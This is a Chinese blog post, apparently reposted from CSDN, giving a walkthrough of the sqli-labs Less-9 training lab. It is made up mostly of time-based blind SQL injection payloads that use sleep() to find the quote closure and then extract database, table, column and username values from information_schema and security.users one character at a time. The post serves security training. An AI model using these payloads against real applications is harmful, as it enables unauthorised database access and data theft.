sqli-labs(less-9)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

 less-9(时间盲注)

1.前端页面没有任何变化

2.时间盲注判断闭合

3.注入逻辑

4.爆破数据库名

5.爆破表名

6.爆破字段名

7.爆破数值

1.前端页面没有任何变化

2.时间盲注判断闭合

?id=1' and sleep(5) -- - #延迟5s

?id=1‘' and sleep(5) -- -

?id=1 and sleep(5) -- -

?id=1‘) and sleep(5) -- -

?id=1‘') and sleep(5) -- -

3.注入逻辑

?id=1' and if((database()='security'),sleep(5),1)-- -

img

?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -

img

4.爆破数据库名

?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='a',sleep(3),1)-- -

img

img

?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -

img

5.爆破表名

?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(3),1)-- -

img

?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)-- -

img

6.爆破字段名

?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(3),1)-- -

img

?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(3),1)-- -

img

7.爆破数值

?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=1,sleep(3),1)-- -

img

img

img

 ?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(3),1)-- - #68是大写字母D

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125776861
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复